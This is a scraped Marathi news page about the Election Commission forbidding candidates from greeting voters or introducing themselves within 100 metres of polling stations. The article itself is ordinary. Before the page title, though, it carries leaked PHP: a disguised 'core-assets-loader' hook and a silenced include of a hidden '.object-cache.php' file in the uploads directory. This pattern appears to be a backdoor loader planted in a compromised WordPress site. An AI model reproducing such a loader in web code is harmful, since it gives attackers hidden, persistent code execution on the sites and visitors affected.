add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); आता ‘नमस्कार’ पडू शकतो महागात! – SOCH INDIA
Menu

दुनिया
आता ‘नमस्कार’ पडू शकतो महागात!

nobanner

बुलडाणा : मतदान केंद्रावर ओळखीचा किंवा अनोळखी मतदार दिसला की त्याला ‘नमस्कार’ घालण्याच्या मोहाला आवर घालणे हे उमेदवारांच्या आवाक्याबाहेरचेच काम. मात्र, आता निवडणूक आयोगाच्या आदेशाने उमेदवारांना ‘नमस्कार’ला विसरावेच लागणार आहे.
अन्यथा पोलिस कारवाई झालीच म्हणून समजा. मतदाराला हात जोडून नमस्कारही केला तरी उमेदवारावर पोलिस कारवाईची वेळ येऊ शकते, असे स्पष्ट आदेश निवडणूक आयोगाने दिलेले आहेत.
उमेदवारांना मतदान केंद्रात प्रवेश करण्याची जी मुभा देण्यात आली आहे, त्याचा गैरवापर अनेक ठिकाणी केल्या जातो. यामध्ये मतदान केंद्रापासून १00 मीटरच्या परिसरात उमेदवाराने स्वत:ची ओळख करून देणे किंवा मतदारांना नमस्कार करणो किंवा मतदान केंद्रात वाजवीपेक्षा जास्तवेळ थांबणे याचा समावेश होतो. हे सर्व प्रकार निश्‍चितच प्रचारामध्ये मोडल्या जात असल्याने हे प्रकार टाळण्यासाठी निवडणूक आयोगाने मतदान केंद्रापासून १00 मीटरच्या आत कोणत्याही व्यक्तीला उमेदवाराने स्वत:ची ओळख करून देऊ नये व नमस्कार करण्याला प्रतिबंध घातला आहे. मतदान सुरू असताना आमदार, खासदार मतदान केंद्राची पाहणी करण्यासाठी फिरत असल्याचा प्रकार दिसून येत होता. मात्र, यालाही आयोगाने बंदी घातली आहे. मुख्यमंत्री, मंत्री, राज्यमंत्री, खासदार, आमदार यांना फ क्त त्या-त्या क्षेत्रात मतदान करण्यासाठीच केंद्रांवर जाता येणार आहे.